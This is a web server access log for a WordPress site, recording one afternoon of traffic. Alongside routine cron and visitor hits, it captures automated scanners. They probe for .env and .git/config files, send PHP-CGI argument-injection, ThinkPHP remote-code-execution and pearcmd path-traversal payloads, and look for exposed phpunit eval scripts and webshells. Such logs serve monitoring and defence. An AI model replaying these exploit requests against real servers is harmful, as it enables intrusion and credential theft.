170.106.147.63 - - [14/Sep/2025:13:52:24 +0800] "GET /wp-content/uploads/2025/07/1750005875-qizhou_map2025616.webp HTTP/1.1" 200 348798 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [14/Sep/2025:14:02:36 +0800] "POST /wp-cron.php?doing_wp_cron=1757829756.0428209304809570312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [14/Sep/2025:14:02:55 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"
36.133.115.36 - - [14/Sep/2025:14:05:56 +0800] "POST /wp-cron.php?doing_wp_cron=1757829956.0308539867401123046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.53.252 - - [14/Sep/2025:14:05:56 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.53.252 - - [14/Sep/2025:14:05:58 +0800] "GET / HTTP/1.1" 200 33468 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [14/Sep/2025:14:17:10 +0800] "POST /wp-cron.php?doing_wp_cron=1757830630.5099968910217285156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:14:17:10 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:14:18:28 +0800] "POST /wp-cron.php?doing_wp_cron=1757830708.2667410373687744140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [14/Sep/2025:14:18:28 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:14:19:16 +0800] "POST /wp-cron.php?doing_wp_cron=1757830756.5225949287414550781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
203.2.64.59 - - [14/Sep/2025:14:19:16 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
203.2.64.59 - - [14/Sep/2025:14:19:17 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [14/Sep/2025:14:39:14 +0800] "POST /wp-cron.php?doing_wp_cron=1757831954.2394890785217285156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:14:39:14 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:14:54:51 +0800] "POST /wp-cron.php?doing_wp_cron=1757832891.2136600017547607421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [14/Sep/2025:14:54:51 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:15:04:16 +0800] "POST /wp-cron.php?doing_wp_cron=1757833456.1514270305633544921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
177.85.233.94 - - [14/Sep/2025:15:04:17 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
36.133.115.36 - - [14/Sep/2025:15:05:08 +0800] "POST /wp-cron.php?doing_wp_cron=1757833508.9453520774841308593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:15:05:08 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:15:25:42 +0800] "POST /wp-cron.php?doing_wp_cron=1757834741.9654018878936767578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [14/Sep/2025:15:25:42 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:15:29:18 +0800] "POST /wp-cron.php?doing_wp_cron=1757834958.6587910652160644531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:15:29:18 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:15:29:57 +0800] "POST /wp-cron.php?doing_wp_cron=1757834997.3991539478302001953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.106.143.6 - - [14/Sep/2025:15:29:57 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
170.106.143.6 - - [14/Sep/2025:15:29:59 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [14/Sep/2025:15:43:45 +0800] "POST /wp-cron.php?doing_wp_cron=1757835825.0664510726928710937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.65.194.16 - - [14/Sep/2025:15:43:45 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [14/Sep/2025:15:53:02 +0800] "POST /wp-cron.php?doing_wp_cron=1757836382.1043479442596435546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:15:53:02 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:15:55:53 +0800] "POST /wp-cron.php?doing_wp_cron=1757836553.0096409320831298828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.203.56.1 - - [14/Sep/2025:15:55:53 +0800] "GET / HTTP/1.1" 301 5 "-" "HTTP Banner Detection (https://security.ipip.net)"
36.133.115.36 - - [14/Sep/2025:15:56:56 +0800] "POST /wp-cron.php?doing_wp_cron=1757836616.6849539279937744140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [14/Sep/2025:15:56:57 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:16:17:55 +0800] "POST /wp-cron.php?doing_wp_cron=1757837875.8132870197296142578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:16:17:55 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
161.35.125.197 - - [14/Sep/2025:16:23:38 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
36.133.115.36 - - [14/Sep/2025:16:28:12 +0800] "POST /wp-cron.php?doing_wp_cron=1757838491.9604671001434326171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
35.203.210.80 - - [14/Sep/2025:16:28:12 +0800] "GET /.well-known/security.txt HTTP/1.1" 301 5 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
35.203.210.80 - - [14/Sep/2025:16:28:13 +0800] "GET /.well-known/security.txt HTTP/1.1" 404 31381 "http://36.133.115.36:80/.well-known/security.txt" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [14/Sep/2025:16:42:10 +0800] "POST /wp-cron.php?doing_wp_cron=1757839330.0602619647979736328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [14/Sep/2025:16:42:10 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:16:44:29 +0800] "POST /wp-cron.php?doing_wp_cron=1757839469.1896619796752929687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:16:44:29 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:17:07:29 +0800] "POST /wp-cron.php?doing_wp_cron=1757840849.6465449333190917968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [14/Sep/2025:17:07:29 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:17:08:50 +0800] "POST /wp-cron.php?doing_wp_cron=1757840930.7232658863067626953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:17:08:50 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:17:19:38 +0800] "POST /wp-cron.php?doing_wp_cron=1757841578.1287379264831542968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.251.84.253 - - [14/Sep/2025:17:19:38 +0800] "GET / HTTP/1.0" 200 151897 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
36.133.115.36 - - [14/Sep/2025:17:32:37 +0800] "POST /wp-cron.php?doing_wp_cron=1757842357.6756229400634765625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:17:32:37 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:17:33:44 +0800] "POST /wp-cron.php?doing_wp_cron=1757842424.6034519672393798828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
49.51.204.74 - - [14/Sep/2025:17:33:44 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [14/Sep/2025:17:51:36 +0800] "POST /wp-cron.php?doing_wp_cron=1757843496.7131140232086181640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [14/Sep/2025:17:51:36 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:18:00:25 +0800] "POST /wp-cron.php?doing_wp_cron=1757844025.1014869213104248046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:18:00:25 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:18:03:37 +0800] "POST /wp-cron.php?doing_wp_cron=1757844217.8936059474945068359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [14/Sep/2025:18:03:38 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:18:09:36 +0800] "POST /wp-cron.php?doing_wp_cron=1757844576.4004919528961181640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
182.44.67.97 - - [14/Sep/2025:18:09:36 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [14/Sep/2025:18:10:32 +0800] "POST /wp-cron.php?doing_wp_cron=1757844632.4004650115966796875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
157.245.217.68 - - [14/Sep/2025:18:10:32 +0800] "GET /.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
157.245.217.68 - - [14/Sep/2025:18:10:33 +0800] "GET /.git/config HTTP/1.1" 404 8990 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
36.133.115.36 - - [14/Sep/2025:18:11:39 +0800] "POST /wp-cron.php?doing_wp_cron=1757844698.9976100921630859375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [14/Sep/2025:18:11:58 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"
52.167.144.188 - - [14/Sep/2025:18:21:17 +0800] "GET /2164/ HTTP/1.1" 200 23705 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [14/Sep/2025:18:25:24 +0800] "POST /wp-cron.php?doing_wp_cron=1757845524.7933399677276611328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:18:25:24 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:18:29:40 +0800] "POST /wp-cron.php?doing_wp_cron=1757845780.6352019309997558593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.156 - - [14/Sep/2025:18:29:41 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [14/Sep/2025:18:31:55 +0800] "POST /wp-cron.php?doing_wp_cron=1757845915.7760519981384277343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [14/Sep/2025:18:32:15 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"
36.133.115.36 - - [14/Sep/2025:18:39:03 +0800] "POST /wp-cron.php?doing_wp_cron=1757846343.4878089427947998046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
134.209.13.197 - - [14/Sep/2025:18:39:03 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31381 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:05 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 151919 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:05 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:06 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:06 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:07 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:07 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:08 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:08 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:09 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:09 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:10 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:10 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:11 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:11 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:12 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:12 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:13 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:13 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:13 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:14 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:14 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:15 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:15 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:16 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:17 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:17 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:18 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:18 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:19 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:19 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:20 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:20 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:21 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:21 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:22 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:22 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:23 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:23 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:24 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 65160 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:25 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:26 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 151919 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:28 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 151919 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:29 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
134.209.13.197 - - [14/Sep/2025:18:39:31 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
43.130.100.35 - - [14/Sep/2025:18:39:40 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [14/Sep/2025:18:48:29 +0800] "POST /wp-cron.php?doing_wp_cron=1757846909.2371420860290527343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [14/Sep/2025:18:48:29 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:18:50:51 +0800] "POST /wp-cron.php?doing_wp_cron=1757847051.8089880943298339843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [14/Sep/2025:18:50:51 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Sep/2025:18:53:53 +0800] "POST /wp-cron.php?doing_wp_cron=1757847233.4254701137542724609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
162.243.26.44 - - [14/Sep/2025:18:53:53 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.26.44 - - [14/Sep/2025:18:53:54 +0800] "GET / HTTP/1.1" 200 39369 "http://36.133.115.36/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.26.44 - - [14/Sep/2025:18:53:55 +0800] "GET /form.html HTTP/1.1" 404 8990 "-" "curl/8.1.2"
162.243.26.44 - - [14/Sep/2025:18:53:56 +0800] "GET /upl.php HTTP/1.1" 404 47 "-" "Mozilla/5.0"
162.243.26.44 - - [14/Sep/2025:18:53:57 +0800] "GET /t4 HTTP/1.1" 404 8990 "-" "Mozilla/5.0"
162.243.26.44 - - [14/Sep/2025:18:53:58 +0800] "GET /geoip/ HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.26.44 - - [14/Sep/2025:18:53:59 +0800] "GET /1.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.26.44 - - [14/Sep/2025:18:54:00 +0800] "GET /systembc/password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.26.44 - - [14/Sep/2025:18:54:00 +0800] "GET /password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
